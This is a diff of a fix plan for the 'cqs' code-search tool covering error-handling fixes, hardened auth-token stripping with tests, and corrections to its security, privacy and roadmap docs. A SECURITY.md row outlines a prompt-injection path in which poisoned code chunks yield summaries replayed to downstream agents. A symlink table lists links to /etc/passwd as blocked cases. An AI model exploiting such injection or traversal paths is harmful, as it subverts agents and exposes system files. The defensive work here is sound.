-        serde_json::json!({})
-    })
-}
-```
-
-### Replacement
-
-```rust
-pub fn impact_to_json(result: &ImpactResult) -> Result<serde_json::Value, serde_json::Error> {
-    serde_json::to_value(result)
-}
-```
-
-Apply same shape to all six sites. Bump call sites to `?`-propagate. The functions all already terminate in `crate::cli::json_envelope::emit_json(&obj)?` which handles `Result`.
-
-### Notes
-
-- `serde_json::to_value` only fails on `Serialize` impl bugs — these are programmer errors, must fail loud, not produce `{}` and a journal warn.
-- Six near-identical changes; ship as one PR.
-
----
-
-## P2.20 — `cache_stats` silently treats `QueryCache::open` failure as 0 bytes
-
-**Finding:** P2.20 in audit-triage.md
-**Files:** `src/cli/commands/infra/cache_cmd.rs:120-139`
-
-### Current code
-
-```rust
-let query_cache_size_bytes: u64 = {
-    let q_path = QueryCache::default_path();
-    if q_path.exists() {
-        match QueryCache::open(&q_path) {
-            Ok(qc) => qc.size_bytes().unwrap_or_else(|e| {
-                tracing::warn!(error = %e, "Query cache size_bytes failed");
-                0
-            }),
-            Err(e) => {
-                tracing::warn!(error = %e, "Query cache open failed for stats");
-                0
-            }
-        }
-    } else {
-        0
-    }
-};
-```
-
-### Replacement
-
-Surface the error as a structured field instead of collapsing to 0:
-
-```rust
-let (query_cache_size_bytes, query_cache_status): (u64, String) = {
-    let q_path = QueryCache::default_path();
-    if !q_path.exists() {
-        (0, "missing".to_string())
-    } else {
-        match QueryCache::open(&q_path) {
-            Ok(qc) => match qc.size_bytes() {
-                Ok(n) => (n, "ok".to_string()),
-                Err(e) => {
-                    tracing::warn!(error = %e, "Query cache size_bytes failed");
-                    (0, format!("error: {e}"))
+    // 2. cqs_token_<port> cookie. RFC 6265 cookie syntax is name=value
+    // pairs separated by `; `. We don't bother with quoted values —
+    // the server only ever sets this cookie itself and never quotes
+    // it. Cookie name is per-port (#1135) so two cqs serve instances
+    // on the same host don't collide in the browser jar.
+    if let Some(cookie_header) = req
+        .headers()
+        .get(header::COOKIE)
+        .and_then(|v| v.to_str().ok())
+    {
+        let needle = format!("{cookie_name}=");
+        for pair in cookie_header.split(';') {
+            if let Some(value) = pair.trim().strip_prefix(&needle) {
+                if ct_eq(value, expected.as_str()) {
+                    return AuthOutcome::Ok;
                 }
-            },
-            Err(e) => {
-                tracing::warn!(error = %e, "Query cache open failed for stats");
-                (0, format!("error: {e}"))
             }
         }
     }
-};
-```
 
-Add `query_cache_status` to the JSON envelope and to the text output.
-
----
-
-## P2.21 — `slot_remove` masks `list_slots` failure as "only slot remaining"
-
-**Finding:** P2.21 in audit-triage.md
-**Files:** `src/cli/commands/infra/slot.rs:303-313`
-
-### Current code
-
-```rust
-let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
-let mut all = list_slots(project_cqs_dir).unwrap_or_default();
-all.retain(|n| n != name);
-
-if name == active {
-    if all.is_empty() {
-        anyhow::bail!(
-            "Refusing to remove the only remaining slot '{}'. Create another slot first.",
-            name
-        );
+    // 3. ?token=… query param. axum's `Query` extractor only deserializes
+    // a typed struct; we want raw access without forcing every request
+    // path through a fixed type, so we parse the URI's `query()` directly.
+    if let Some(query) = req.uri().query() {
+        for pair in query.split('&') {
+            if let Some(value) = pair.strip_prefix("token=") {
+                // URI query values can be percent-encoded; the token
+                // alphabet is URL-safe base64 (`A-Z a-z 0-9 - _`) so no
+                // percent-encoding is ever needed in practice. Compare
+                // verbatim — a percent-encoded match would fail `ct_eq`,
+                // which is the conservative choice.
+                if ct_eq(value, expected.as_str()) {
+                    return AuthOutcome::OkViaQueryParam;
+                }
+            }
+        }
     }
-    // ...
+
+    AuthOutcome::Unauthorized
 }
 ```
 
 ### Replacement
 
 ```rust
-use anyhow::Context;
+/// Case-fold + percent-decode a query-pair key for comparison.
+/// SEC-7 leakage fix (CQ-V1.30.1-4): `?Token=…` and `?%74oken=…` must be
+/// recognised as `token=` so the redirect strips them.
+fn pair_key_is_token(pair: &str) -> bool {
+    let Some(eq_idx) = pair.find('=') else {
+        return pair.eq_ignore_ascii_case("token");
+    };
+    let raw_key = &pair[..eq_idx];
+    // Percent-decode the key. The token alphabet itself is URL-safe
+    // base64 (no percent-encoding needed), but operators sometimes
+    // hand-encode the key; we want `%74oken=` to match too.
+    let decoded = percent_encoding::percent_decode_str(raw_key)
+        .decode_utf8_lossy();
+    decoded.eq_ignore_ascii_case("token")
+}
 
-let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
-let mut all = list_slots(project_cqs_dir)
-    .context("Failed to list slots while validating remove")?;
-all.retain(|n| n != name);
-```
-
-### Notes
-
-- Same pattern at `src/cli/commands/infra/slot.rs:273` (`slot_promote`), `:304` (already), and `src/cli/commands/infra/doctor.rs:923` — sweep them all in this PR.
-
----
-
-## P2.22 — `build_token_pack` swallows `get_caller_counts_batch` error
-
-**Finding:** P2.22 in audit-triage.md
-**Files:** `src/cli/commands/io/context.rs:438-441`
-
-### Current code
-
-```rust
-let caller_counts = store.get_caller_counts_batch(&names).unwrap_or_else(|e| {
-    tracing::warn!(error = %e, "Failed to fetch caller counts for token packing");
-    HashMap::new()
-});
-let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
-```
-
-### Replacement
-
-`build_token_pack` already returns `Result`; propagate:
-
-```rust
-let caller_counts = store.get_caller_counts_batch(&names)
-    .context("Failed to fetch caller counts for token packing — ranking signal required")?;
-let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
-```
-
-### Notes
-
-- Packing without ranking signal is worse than failing the command — current behavior silently degrades to file-order with no signal in JSON output.
-- Sibling `build_full_data` carries a `warnings` field; consider folding this into that pattern instead of `?` if the caller wants degraded output. The propagation path is preferred per the finding.
-
----
-
-## P2.23 — `read --focus` silently empties `type_chunks` on store batch failure
-
-**Finding:** P2.23 in audit-triage.md
-**Files:** `src/cli/commands/io/read.rs:230-235`
-
-### Current code
-
-```rust
-let batch_results = store
-    .search_by_names_batch(&type_names, 5)
-    .unwrap_or_else(|e| {
-        tracing::warn!(error = %e, "Failed to batch-lookup type definitions for focused read");
-        std::collections::HashMap::new()
-    });
-```
-
-### Replacement
-
-Add a `warnings: Vec<String>` field to `FocusedReadOutput` and push when fetch fails:
-
-```rust
-let batch_results = match store.search_by_names_batch(&type_names, 5) {
-    Ok(m) => m,
-    Err(e) => {
-        let msg = format!("search_by_names_batch failed: {e}; type definitions omitted");
-        tracing::warn!(error = %e, "Failed to batch-lookup type definitions for focused read");
-        warnings.push(msg);
-        std::collections::HashMap::new()
+/// Strip the `token` parameter from the URI's query string for the
+/// post-auth redirect. Other query params are preserved in their
+/// original order. Recognises `Token=`, `%74oken=`, and any case-/
+/// percent-folded variant.
+fn strip_token_param(uri: &Uri) -> String {
+    let path = uri.path();
+    let Some(query) = uri.query() else {
+        return path.to_string();
+    };
+    let kept: Vec<&str> = query
+        .split('&')
+        .filter(|pair| !pair.is_empty() && !pair_key_is_token(pair))
+        .collect();
+    if kept.is_empty() {
+        path.to_string()
+    } else {
+        format!("{path}?{}", kept.join("&"))
     }
-};
+}
+
+/// Extract the token from one of three channels — header, cookie,
+/// or query string — and constant-time-compare against the launched
+/// token. AC-V1.30.1-5: even when Bearer or cookie matches, if a
+/// `token=` query param is also present, return `OkViaQueryParam` so
+/// the caller redirects to the clean URL — leaving a stale `?token=`
+/// in the URL bar is the exact SEC-7 leakage path the redirect closes.
+fn check_request(req: &Request, expected: &AuthToken, cookie_name: &str) -> AuthOutcome {
+    // Sniff for any `?token=…` first — if present, we want to redirect
+    // even when another channel also matches. Validity of the query
+    // value isn't required for the redirect; the redirect's only job
+    // is to scrub the URL bar.
+    let query_has_token_param = req
+        .uri()
+        .query()
+        .is_some_and(|q| q.split('&').any(pair_key_is_token));
+
+    // 1. Authorization: Bearer …
+    let bearer_ok = req
+        .headers()
+        .get(header::AUTHORIZATION)
+        .and_then(|v| v.to_str().ok())
+        .and_then(|v| v.strip_prefix("Bearer "))
+        .is_some_and(|bearer| ct_eq(bearer, expected.as_str()));
+
+    // 2. cqs_token_<port> cookie. RFC 6265 cookie syntax is name=value
+    // pairs separated by `; `. We don't bother with quoted values —
+    // the server only ever sets this cookie itself and never quotes
+    // it. Cookie name is per-port (#1135) so two cqs serve instances
+    // on the same host don't collide in the browser jar.
+    let cookie_ok = req
+        .headers()
+        .get(header::COOKIE)
+        .and_then(|v| v.to_str().ok())
+        .map(|cookie_header| {
+            let needle = format!("{cookie_name}=");
+            cookie_header.split(';').any(|pair| {
+                pair.trim()
+                    .strip_prefix(&needle)
+                    .is_some_and(|value| ct_eq(value, expected.as_str()))
+            })
+        })
+        .unwrap_or(false);
+
+    // 3. ?token=… query param. axum's `Query` extractor only deserializes
+    // a typed struct; we want raw access without forcing every request
+    // path through a fixed type, so we parse the URI's `query()` directly.
+    let query_ok = req.uri().query().is_some_and(|query| {
+        query
+            .split('&')
+            .filter(|pair| pair_key_is_token(pair))
+            .any(|pair| {
+                let value = pair.split_once('=').map(|(_, v)| v).unwrap_or("");
+                ct_eq(value, expected.as_str())
+            })
+    });
+
+    if !(bearer_ok || cookie_ok || query_ok) {
+        return AuthOutcome::Unauthorized;
+    }
+
+    // AC-V1.30.1-5: presence of `?token=…` (any case-folded form) on a
+    // request that authenticates by ANY channel must trigger the
+    // redirect — otherwise the token sits in the URL bar permanently
+    // after a bookmarked-URL reload, even when the cookie is what
+    // matched.
+    if query_has_token_param {
+        AuthOutcome::OkViaQueryParam
+    } else {
+        AuthOutcome::Ok
+    }
+}
 ```
 
-In the typed output struct:
+Add `percent-encoding = "2"` to `Cargo.toml`'s `[dependencies]` if not already there. (The crate is in the dependency tree via `reqwest`, but the import has to be explicit.) Verify with `cargo tree -p percent-encoding`.
+
+Then invert the two pinned tests at `src/serve/auth.rs` (around lines 572-600):
 
 ```rust
-#[derive(Serialize)]
-struct FocusedReadOutput {
-    // ... existing fields
+    #[test]
+    #[allow(non_snake_case)]
+    fn p2_30_strip_token_param_capital_T_token_IS_stripped() {
+        // CQ-V1.30.1-4: capital `Token=` is case-folded and stripped.
+        // The SEC-7 leakage gap pinned by the previous test is closed.
+        let uri: Uri = "/api/graph?Token=abc&depth=3".parse().unwrap();
+        let stripped = strip_token_param(&uri);
+        assert_eq!(stripped, "/api/graph?depth=3");
+    }
+
+    #[test]
+    fn p2_30_strip_token_param_percent_encoded_key_IS_stripped() {
+        // CQ-V1.30.1-4: `%74oken=` is percent-decoded and stripped.
+        let uri: Uri = "/api/graph?%74oken=abc&depth=3".parse().unwrap();
+        let stripped = strip_token_param(&uri);
+        assert_eq!(stripped, "/api/graph?depth=3");
+    }
+```
+
+Also add a new test for AC-V1.30.1-5 (cookie + redundant query → redirect):
+
+```rust
+    #[test]
+    fn check_request_cookie_with_redundant_query_token_redirects() {
+        // AC-V1.30.1-5: even when the cookie matches, a `?token=` query
+        // param must trigger the redirect so the URL bar is scrubbed.
+        let token = AuthToken::random();
+        let cookie_name = "cqs_token_8080";
+        let req = Request::builder()
+            .uri("/api/graph?token=anything")
+            .header(
+                header::COOKIE,
+                format!("{cookie_name}={}", token.as_str()),
+            )
+            .body(Body::empty())
+            .unwrap();
+        let outcome = check_request(&req, &token, cookie_name);
+        assert!(matches!(outcome, AuthOutcome::OkViaQueryParam));
+    }
+```
+
+### Verification
+
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib serve::auth::tests::strip_token_param`
+- `cargo test --features cuda-index --lib serve::auth::tests::p2_30_strip_token_param`
+- `cargo test --features cuda-index --lib serve::auth::tests::check_request`
+- Manual: `cqs serve --bind 127.0.0.1:8088 &` then `curl -i 'http://127.0.0.1:8088/?token=GOOD' --cookie 'cqs_token_8088=GOOD'` should return 302 to `/`.
+
+---
+
+## P1.4: DOC-V1.30.1-1 — PRIVACY/SECURITY misstate embedding-cache primary key
+
+**Reframed during verification:** Original prompt invented a `purpose='summary'` cache row that doesn't exist — `embedding_cache` only has purposes `embedding` and `embedding_base`; the LLM summary text lives in a separate `llm_summaries` table.
+
+**Files:** `PRIVACY.md:16`, `SECURITY.md:47`
+**Effort:** ~5 minutes
+**Why:** The cache schema at `src/cache.rs:263-278` is `PRIMARY KEY (content_hash, model_fingerprint, purpose)` — `purpose` was added in #1128 to discriminate the post-enrichment `embedding` column from the raw `embedding_base` column (added in v18). The two paths produce different vectors for the same content, and without `purpose` in the PK the second writer silently overwrites the first. PRIVACY.md tells users the key is a 2-tuple `(content_hash, model_id)`; SECURITY.md says the LLM summary is "cached by `content_hash`" without naming the table. Per "Docs Lying Is P1": both claims are wrong about *where and how* data is stored, and the corrected text must reflect actual schema (`CachePurpose` is exactly `Embedding ("embedding")` and `EmbeddingBase ("embedding_base")` per `src/cache.rs:84-104`; LLM summaries live in `llm_summaries` keyed by `(content_hash, purpose)` per `src/schema.sql:180-187`).
+
+### Current docs
+
+PRIVACY.md:16:
+```markdown
+- `.cqs/embeddings_cache.db` — per-project embedding cache, keyed by `(content_hash, model_id)` (#1105). Skips re-embedding chunks that haven't changed across reindexes / model swaps.
+```
+
+SECURITY.md:47:
+```markdown
+| **LLM-generated summaries** (`cqs index --llm-summaries`) | Claude is prompted with chunk content; a poisoned chunk can produce a summary that contains injection text. The summary is cached by `content_hash`, embedded, and replayed to downstream agents | Yes — cached in `llm_summaries` table |
+```
+
+### Replacement
+
+PRIVACY.md:16:
+```markdown
+- `.cqs/embeddings_cache.db` — per-project embedding cache, keyed by `(content_hash, model_fingerprint, purpose)` (#1105, #1128). Skips re-embedding chunks that haven't changed across reindexes / model swaps; the `purpose` discriminator (`embedding` for the post-enrichment vector served by HNSW, `embedding_base` for the raw NL vector served by the dual-index "base" graph) prevents the two streams from overwriting each other when the same chunk produces both.
+```
+
+SECURITY.md:47:
+```markdown
+| **LLM-generated summaries** (`cqs index --llm-summaries`) | Claude is prompted with chunk content; a poisoned chunk can produce a summary that contains injection text. The summary text is cached in the `llm_summaries` table keyed by `(content_hash, purpose)` per `src/schema.sql:180-187`; the post-summary embedding flows through the normal `embeddings_cache.db` (purpose `embedding`, the same purpose served to search) and is replayed to downstream agents | Yes — cached in `llm_summaries` table + `embeddings_cache.db` |
+```
+
+### Verification
+
+- `grep -n "model_id\|model_fingerprint\|purpose" /mnt/c/Projects/cqs/PRIVACY.md /mnt/c/Projects/cqs/SECURITY.md` — confirm the strings line up with `src/cache.rs:263-278` schema and `src/schema.sql:180-187`.
+- `grep -n "CachePurpose\|as_str" /mnt/c/Projects/cqs/src/cache.rs | head` — confirm only `embedding` and `embedding_base` exist as purpose values; no `'summary'` purpose row exists in `embedding_cache`.
+- No code build needed (doc-only).
+
+---
+
+## P1.5: SEC-V1.30.1-2 — SECURITY.md "Symlink Behavior" matrix contradicts indexer
+
+**Files:** `SECURITY.md:203-215`, `SECURITY.md:162` (cross-check)
+**Effort:** ~5 minutes
+**Why:** SECURITY.md:203-215 promises symlinks are followed-then-validated (`project/link → project/src/file.rs` is allowed). Reality: `cqs::enumerate_files` at `src/lib.rs:601` calls `WalkBuilder::follow_links(false)` — every symlink is silently skipped, regardless of target. SECURITY.md:162 already correctly says "Symlinks are skipped during directory walks and archive extraction". The two sections cannot both be true. Operators expecting indexable in-tree symlinks (e.g. monorepo workspaces) get a partial index with no error message. Per "Docs Lying Is P1": the doc claim must match the code. The indexer behavior is the right one (avoids zip-slip-style attacks); the matrix needs the truth.
+
+### Current docs (SECURITY.md:203-215)
+
+```markdown
+## Symlink Behavior
+
+**Current behavior**: Symlinks are followed, then the resolved path is validated.
+
+| Scenario | Behavior |
+|----------|----------|
+| `project/link → project/src/file.rs` | ✅ Allowed (target inside project) |
+| `project/link → /etc/passwd` | ❌ Blocked (target outside project) |
+| `project/link → ../sibling/file` | ❌ Blocked (target outside project) |
+
+**TOCTOU consideration**: A symlink could theoretically be changed between validation and read. This is a standard filesystem race condition that affects all programs. Mitigation would require `O_NOFOLLOW` or similar, which would break legitimate symlink use cases.
+
+**Recommendation**: If you don't trust symlinks in your project, remove them or use `--no-ignore` to skip gitignored paths where symlinks might hide.
+```
+
+### Replacement
+
+```markdown
+## Symlink Behavior
+
+cqs has **two** symlink-handling regimes, depending on the entry point.
+
+### Directory walks (`cqs index`, `cqs ref add`, `cqs watch` reconcile, `cqs convert`)
+
+Symlinks are **skipped** entirely — `enumerate_files` (`src/lib.rs:601`) sets `WalkBuilder::follow_links(false)` and `cqs convert`'s archive extraction skips them in extract paths. The walker never opens the link's target.
+
+| Scenario | Behavior |
+|----------|----------|
+| `project/link → project/src/file.rs` | Skipped (symlink, regardless of target) |
+| `project/link → /etc/passwd` | Skipped |
+| `project/link → ../sibling/file` | Skipped |
+
+This is conservative: a monorepo workspace that uses in-tree symlinks to share common code will silently miss those files. Workaround: replace the symlinks with the actual files (or use a `[references]` config block to index the shared tree as a separate slot).
+
+### Explicit-path canonicalization (`cqs read <path>`, `cqs ref add --source <path>`)
+
+When the user passes a path on the command line, cqs canonicalizes it (`dunce::canonicalize`), then validates the resolved path against the project root.
+
+| Scenario | Behavior |
+|----------|----------|
+| `cqs read link` where `link → project/src/file.rs` | Allowed (target inside project, canonicalised path reads `project/src/file.rs`) |
+| `cqs read link` where `link → /etc/passwd` | Blocked (target outside project) |
+| `cqs read link` where `link → ../sibling/file` | Blocked (target outside project) |
+
+**TOCTOU consideration**: A symlink could theoretically be changed between canonicalization and read. This is a standard filesystem race condition that affects all programs. Mitigation would require `O_NOFOLLOW` or similar, which would break legitimate symlink use cases on `cqs read`.
+
+**Recommendation**: If you don't trust symlinks in your project, remove them. The directory-walk path is already conservative.
+```
+
+### Verification
+
+- `grep -n "follow_links" /mnt/c/Projects/cqs/src/lib.rs` — confirm `follow_links(false)` still in place.
+- `grep -n "Symlink filtering" /mnt/c/Projects/cqs/SECURITY.md` — line 162 should still read "Symlinks are skipped during directory walks and archive extraction" (consistent with new matrix).
+- No code build needed (doc-only).
+
+---
+
+## P1.6: SEC-V1.30.1-1 — SECURITY claims `read --focus` / `context` carry `trust_level` (they don't)
+
+**Files:** `SECURITY.md:57`, `src/cli/commands/io/read.rs:310-323`, `src/cli/commands/io/context.rs:219-248`
+**Effort:** ~30 minutes
+**Why:** SECURITY.md:57 lists `read`, `read --focus`, and `context` as JSON outputs that carry `trust_level: "user-code" | "reference-code"` and per-chunk `injection_flags: []`. Verification:
+- `FocusedReadJsonOutput` (read.rs:310-323) has fields `{focus, content, hints, warnings}` — no `trust_level`, no `injection_flags`.
+- `FullChunkEntry` (context.rs:239-248) has `{name, chunk_type, signature, line_start, line_end, doc, content}` — no `trust_level`, no `injection_flags`.
+- The `tag_user_code_trust_level` walker only walks scout/onboard shapes (`entry_point`, `call_chain[]`, `callers[]`, `file_groups[].chunks[]`).
+
+Per "Docs Lying Is P1": both the doc claim *and* the code must be brought in line. Cheapest correct fix: extend the JSON shapes to carry the field (fixed value `"user-code"` for project-store paths; `"reference-code"` if the path resolves to a `cqs ref` index — but `read --focus` and `context` always read from the project store, so this fix is the constant `"user-code"` plus the empty `injection_flags`).
+
+### Current code
+
+```rust
+//   src/cli/commands/io/read.rs:310-323
+/// JSON output for a focused read.
+#[derive(Debug, serde::Serialize)]
+struct FocusedReadJsonOutput {
+    focus: String,
+    content: String,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    hints: Option<ReadHints>,
+    /// P2.23: warnings emitted by the underlying assembly (e.g.
+    /// `search_by_names_batch` failed). Mirrors `SummaryOutput::warnings`
+    /// per EH-V1.29-9 — agents need to distinguish "no type deps" from
+    /// "type-deps lookup failed silently".
     #[serde(skip_serializing_if = "Vec::is_empty")]
     warnings: Vec<String>,
 }
 ```
 
-### Notes
+```rust
+//   src/cli/commands/io/context.rs:237-248
+/// A chunk in full context output.
+#[derive(Debug, serde::Serialize)]
+pub(crate) struct FullChunkEntry {
+    pub name: String,
+    pub chunk_type: String,
+    pub signature: String,
+    pub line_start: u32,
+    pub line_end: u32,
+    pub doc: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub content: Option<String>,
+}
+```
 
-- Mirrors `SummaryOutput::warnings` in `src/cli/commands/io/context.rs:464`.
-- Either propagation (`?`) or warnings-field is acceptable; warnings-field preferred per the EH-V1.29-9 family.
+### Replacement
+
+```rust
+//   src/cli/commands/io/read.rs:310-323
+/// JSON output for a focused read.
+#[derive(Debug, serde::Serialize)]
+struct FocusedReadJsonOutput {
+    focus: String,
+    content: String,
+    /// SEC-V1.30.1-1: every chunk-returning JSON output must carry a
+    /// trust_level. `read --focus` reads from the project store only
+    /// (no reference-store fan-in), so this is always "user-code".
+    /// SECURITY.md's mitigation contract is that agents can branch
+    /// safely on this field; the `read --focus` path was missing it.
+    trust_level: &'static str,
+    /// SEC-V1.30.1-1: parallel field to chunk JSON. `read --focus`
+    /// content is delivered as a single concatenated string, not a
+    /// per-chunk list, so there is no per-chunk array — a single
+    /// empty array satisfies the schema-stability contract.
+    injection_flags: Vec<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    hints: Option<ReadHints>,
+    /// P2.23: warnings emitted by the underlying assembly (e.g.
+    /// `search_by_names_batch` failed). Mirrors `SummaryOutput::warnings`
+    /// per EH-V1.29-9 — agents need to distinguish "no type deps" from
+    /// "type-deps lookup failed silently".
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    warnings: Vec<String>,
+}
+```
+
+```rust
+//   src/cli/commands/io/context.rs:237-248
+/// A chunk in full context output.
+#[derive(Debug, serde::Serialize)]
+pub(crate) struct FullChunkEntry {
+    pub name: String,
+    pub chunk_type: String,
+    pub signature: String,
+    pub line_start: u32,
+    pub line_end: u32,
+    pub doc: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub content: Option<String>,
+    /// SEC-V1.30.1-1: every chunk-returning JSON output must carry a
+    /// trust_level. `cqs context` reads from the project store only;
+    /// always "user-code". SECURITY.md mitigation contract.
+    pub trust_level: &'static str,
+    /// SEC-V1.30.1-1: per-chunk injection-heuristic flags. The full
+    /// per-content-scan integration is #1181 follow-up; for now the
+    /// schema-stability contract requires the field be present and an
+    /// empty `Vec<String>` reflects "no heuristics fired".
+    pub injection_flags: Vec<String>,
+}
+```
+
+Then update the construction sites. In `read.rs`, the production constructor at line 408-413 becomes:
+
+```rust
+        let output = FocusedReadJsonOutput {
+            focus: focus.to_string(),
+            content: result.output,
+            trust_level: "user-code",
+            injection_flags: Vec::new(),
+            hints,
+            warnings: result.warnings.clone(),
+        };
+```
+
+The `#[cfg(test)] mod tests` block in the same file has 3 additional `FocusedReadJsonOutput { ... }` literals that the new required fields will break unless updated. The exact sites are:
+
+`src/cli/commands/io/read.rs:447` (`focused_read_output_with_hints`):
+```rust
+        let output = FocusedReadJsonOutput {
+            focus: "search".into(),
+            content: "fn search() { ... }".into(),
+            trust_level: "user-code",
+            injection_flags: Vec::new(),
+            hints: Some(ReadHints {
+                caller_count: 3,
+                test_count: 2,
+                no_callers: false,
+                no_tests: false,
+            }),
+            warnings: Vec::new(),
+        };
+```
+
+`src/cli/commands/io/read.rs:470` (`focused_read_output_no_hints`):
+```rust
+        let output = FocusedReadJsonOutput {
+            focus: "MyStruct".into(),
+            content: "struct MyStruct {}".into(),
+            trust_level: "user-code",
+            injection_flags: Vec::new(),
+            hints: None,
+            warnings: Vec::new(),
+        };
+```
+
+`src/cli/commands/io/read.rs:486` (`focused_read_output_with_warnings`):
+```rust
+        let output = FocusedReadJsonOutput {
+            focus: "MyStruct".into(),
+            content: "struct MyStruct {}".into(),
+            trust_level: "user-code",
+            injection_flags: Vec::new(),
+            hints: None,
+            warnings: vec!["search_by_names_batch failed: db locked".into()],
+        };
+```
+
+In `context.rs`, the `FullChunkEntry` constructor at line 281-289 becomes:
+
+```rust
+            FullChunkEntry {
+                name: c.name.clone(),
+                chunk_type: c.chunk_type.to_string(),
+                signature: c.signature.clone(),
+                line_start: c.line_start,
+                line_end: c.line_end,
+                doc: c.doc.clone(),
+                content,
+                trust_level: "user-code",
+                injection_flags: Vec::new(),
+            }
+```
+
+The `CompactChunkEntry` and `SummaryChunkEntry` structs also need the new fields, since SECURITY.md:57 names `read`, `read --focus`, *and* `context` as carriers of `trust_level`. `cqs context --compact` and `cqs context --summary` both fall under the `context` surface.
+
+`src/cli/commands/io/context.rs:60-68` — extend the struct:
+```rust
+/// A single chunk in compact context output.
+#[derive(Debug, serde::Serialize)]
+pub(crate) struct CompactChunkEntry {
+    pub name: String,
+    pub chunk_type: String,
+    pub signature: String,
+    pub line_start: u32,
+    pub line_end: u32,
+    pub caller_count: u64,
+    pub callee_count: u64,
+    /// SEC-V1.30.1-1: every chunk-returning JSON output must carry a
+    /// trust_level. `cqs context --compact` reads from the project store
+    /// only; always "user-code".
+    pub trust_level: &'static str,
+    /// SEC-V1.30.1-1: per-chunk injection-heuristic flags. Empty for now;
+    /// schema-stability contract requires the field be present.
+    pub injection_flags: Vec<String>,
+}
+```
+
+`src/cli/commands/io/context.rs:84` — update the constructor inside `compact_to_json`:
+```rust
+            CompactChunkEntry {
+                name: c.name.clone(),
+                chunk_type: c.chunk_type.to_string(),
+                signature: c.signature.clone(),
+                line_start: c.line_start,
+                line_end: c.line_end,
+                caller_count: cc,
+                callee_count: ce,
+                trust_level: "user-code",
+                injection_flags: Vec::new(),
+            }
+```
+
+`src/cli/commands/io/context.rs:472-477` — extend `SummaryChunkEntry`:
+```rust
+/// A chunk in summary context output.
+#[derive(Debug, serde::Serialize)]
+pub(crate) struct SummaryChunkEntry {
+    pub name: String,
+    pub chunk_type: String,
+    pub line_start: u32,
+    pub line_end: u32,
+    /// SEC-V1.30.1-1: every chunk-returning JSON output must carry a
+    /// trust_level. `cqs context --summary` reads from the project store
+    /// only; always "user-code".
+    pub trust_level: &'static str,
+    /// SEC-V1.30.1-1: per-chunk injection-heuristic flags.
+    pub injection_flags: Vec<String>,
+}
+```
+
+`src/cli/commands/io/context.rs:486` — update the constructor inside `summary_to_json`:
+```rust
+        .map(|c| SummaryChunkEntry {
+            name: c.name.clone(),
+            chunk_type: c.chunk_type.to_string(),
+            line_start: c.line_start,
+            line_end: c.line_end,
+            trust_level: "user-code",
+            injection_flags: Vec::new(),
+        })
+```
+
+If existing integration tests in `context.rs` (e.g. `hp1_compact_to_json_*`) construct any of these structs literally, they need the same two fields added.
+
+### Verification
+
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib io::read`
+- `cargo test --features cuda-index --lib io::context`
+- Manual: `cqs read --focus some_function --json | jq '.trust_level, .injection_flags'` should print `"user-code"` and `[]`.
+- Manual: `cqs context some_file.rs --full --json | jq '.chunks[0].trust_level, .chunks[0].injection_flags'` should print the same.
+- Manual: `cqs context some_file.rs --compact --json | jq '.chunks[0].trust_level'` and `cqs context some_file.rs --summary --json | jq '.chunks[0].trust_level'` should also print `"user-code"`.
+- `grep -n "trust_level\|injection_flags" /mnt/c/Projects/cqs/SECURITY.md` — confirm SECURITY.md:57 and :61 still read accurately (no doc edit needed once code matches).
 
 ---
 
-## P2.24 — `serve::build_chunk_detail` collapses NULL signature/content to empty string
+## P1.7: DOC-V1.30.1-7 — SECURITY.md auth claim missing cookie + `NoAuthAcknowledgement`
 
-**Finding:** P2.24 in audit-triage.md
-**Files:** `src/serve/data.rs:488-492`
+**Files:** `SECURITY.md:17`
+**Effort:** ~5 minutes
+**Why:** SECURITY.md:17 describes the auth surface as the v1.29 shape — "cookie handoff is `HttpOnly; SameSite=Strict`; compare is constant-time. `--no-auth` opts out". Two v1.30 hardenings landed and aren't reflected:
+- (#1135) Cookie name renamed to `cqs_token_<port>` so concurrent `cqs serve` instances on the same host don't collide in the browser jar.
+- (#1136) `--no-auth` now requires constructing a `NoAuthAcknowledgement` proof token; an internal caller cannot accidentally ship a fully-open server.
+
+Per "Docs Lying Is P1": SECURITY.md is the canonical surface for auth claims; missing protections that were just landed makes the doc weaker than the code.
+
+### Current docs
+
+```markdown
+| **`cqs serve` HTTP clients** | Untrusted by default | Per-launch 256-bit auth token gates every request (#1118 / SEC-7); cookie handoff is `HttpOnly; SameSite=Strict`; compare is constant-time. `--no-auth` opts out for scripted automation but is paired with a loud-warn banner on non-loopback binds. |
+```
+
+### Replacement
+
+```markdown
+| **`cqs serve` HTTP clients** | Untrusted by default | Per-launch 256-bit auth token gates every request (#1118 / SEC-7). Three credential channels: `Authorization: Bearer`, `cqs_token_<port>` cookie (port-scoped per RFC 6265, #1135 — concurrent instances don't collide in the browser jar), `?token=` query param. Cookie handoff is `HttpOnly; SameSite=Strict; Path=/`; compare is constant-time on every channel. Disabling auth requires `--no-auth` plus an internal `NoAuthAcknowledgement` proof token (#1136), so no internal caller can ship a fully-open server by accident; the disabled branch logs a structured `tracing::error!` regardless of `quiet`. Loud-warn banner on non-loopback binds with `--no-auth`. |
+```
+
+### Verification
+
+- `grep -n "cqs_token_\|NoAuthAcknowledgement" /mnt/c/Projects/cqs/SECURITY.md` — should find at least one match (the new line above).
+- `grep -rn "NoAuthAcknowledgement\|cookie_name_for_port" /mnt/c/Projects/cqs/src/serve/` — confirm both names exist in code (they do, per #1135/#1136 PRs).
+- No code build needed (doc-only).
+
+---
+
+## P1.8: DOC-V1.30.1-4 — ROADMAP claims #1182 acceptance test pending; #1196 already merged
+
+**Files:** `ROADMAP.md:16`, `ROADMAP.md:142`
+**Effort:** ~3 minutes
+**Why:** Both lines say "remaining acceptance item is the WSL-specific integration test" — but `git log` shows `a240ad08 test(watch): bulk-delta reconcile pass for #1182 acceptance — 47-file scenario (#1196)` already merged before v1.30.1 cut. The ROADMAP is now lying about open work; agents reading the roadmap will think there's still a test gap to fill and either duplicate work or distrust the rest of the doc.
+
+### Current docs
+
+ROADMAP.md:16:
+```markdown
